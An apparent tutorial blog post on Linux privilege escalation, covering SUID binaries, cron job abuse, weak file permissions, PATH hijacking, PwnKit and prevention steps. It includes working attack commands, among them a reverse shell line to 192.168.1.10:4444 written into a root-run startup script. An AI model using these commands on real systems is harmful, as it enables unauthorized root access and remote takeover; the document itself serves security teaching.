Privilege Escalation Vulnerabilities Explained with Examples and Exploits

One of the most risky and most frequently used bugs is a privilege escalation vulnerability. It sounds like a mouthful, but in all honesty, the idea is very straightforward—and it's something you really should know about if you're interested in computer security.

Prefer watching instead of reading? Here’s a quick video guide

What is Privilege Escalation?

Imagine a computer system as a building. Not everyone has access to all rooms. A janitor can access cleaning closets, but the CEO possesses keys to the executive office. Similarly, computer users possess various levels of access—also referred to as privileges.

• Normal users can access things such as browsing the web or using software.
• Administrators (or root users) can install programs, modify system settings, and read sensitive files.

Privilege escalation occurs when a user achieves greater access than they should. For instance, if a normal user deceives the system into providing them with administrator privileges, they can now execute activities they never had permission to perform.

Why is it Threatening?

When an attacker obtains admin privileges by exploiting a weakness, they can:

• Install malware
• Steal or delete sensitive information
• Change security settings
• Open backdoors for subsequent attacks

In essence, they can completely control the system.

Types of Privilege Escalation

• Vertical Privilege Escalation: This is when an attacker climbs the ladder of access—from a regular user to an admin. This is the most risky type because it grants attackers complete control.
• Horizontal Privilege Escalation: This is when an attacker remains at the same level of access but reaches someone else's information or resources. For instance, a standard user looking at another user's confidential files.

Common Exploitation Techniques

1. SUID Binaries on Linux: SUID means a program runs with the permission of the file owner, not the user who runs it. If misconfigured, it can lead to root access.

Check for SUID binaries:

# Input Command
find / -perm -4000 -type f 2>/dev/null

# Output Example
-rwsr-xr-x 1 root root 133K Jan 15 2024 /usr/bin/vulnerable-bin

Exploit vulnerable C binary:

// vulnerable-bin.c
#include <stdlib.h>

int main() {
   system("/bin/sh"); // runs shell with root privilege
   return 0;
}

If compiled and given SUID root:

gcc vulnerable-bin.c -o vulnerable-bin
chmod u+s vulnerable-bin

Running this as a user:

./vulnerable-bin
# Now you’re root inside the shell!

2. Cron Job Abuse: Admins often schedule tasks using cron. If misconfigured, it can run attacker’s code as root.

# Input Command
ls -l /etc/cron.d/customjob

# Output Example
* * * * * root /tmp/myscript.sh

If /tmp/myscript.sh is writable:

echo "/bin/bash" > /tmp/myscript.sh
chmod +x /tmp/myscript.sh

Now you’re root!

3. Weak File Permissions: Sensitive files with weak permissions can be overwritten.

# Input Command
ls -l /usr/local/bin/startup.sh

# Output Example
-rw-rw-rw- 1 root root 124 Jan 1 00:00 /usr/local/bin/startup.sh

Now inject your payload

echo "bash -i >& /dev/tcp/192.168.1.10/4444 0>&1" > /usr/local/bin/startup.sh

4. PATH Environment Variable Exploit: Some scripts run system tools like cp, ls, cat — but don’t use full paths.

#!/bin/bash
cp /etc/passwd /tmp/backup

If cp is not given a full path (/bin/cp), attacker can trick it.

Create fake cp

echo '#!/bin/bash' > /tmp/cp
echo 'bash' >> /tmp/cp
chmod +x /tmp/cp

Hijack PATH

export PATH=/tmp:$PATH
./vulnerable-script.sh

How Does Privilege Escalation Occur?

Attackers frequently employ one of the following:

• Exploiting software bugs: A poorly constructed program may by accident provide excess access to users.
• Misconfigured systems: Occasionally, systems are configured so that they are at risk, such as granting unwarranted permissions.
• Password weaknesses: If admin passwords are weak or stored in an insecure manner, attackers can break them.
• Insecure scripts or services: Scripts that execute with elevated privileges can be exploited if not secured properly.

Real-World Example

In 2021, a bug in the Linux pkexec tool (PwnKit) permitted local users to elevate to root privileges. The tool was meant to execute commands safely as another user, but since there was a bug, it was possible for anyone to exploit it to attain admin rights without a password.

Preventing Privilege Escalation

Several steps can be taken by individuals and organizations:

• Implement patches and updates regularly
• Apply the principle of least privilege: Grant access to users only where they need it
• Audit permissions to identify over-privileged accounts
• Look at logs for anomalous behavior
• Implement security technologies such as antivirus, endpoint security, and SIEM systems

Final Thoughts

Privilege escalation flaws are like open doors in a fortified building. If all else is locked up, one open door can provide an attacker with complete authority. This is why finding and correcting these weaknesses is of utmost concern to cybersecurity experts.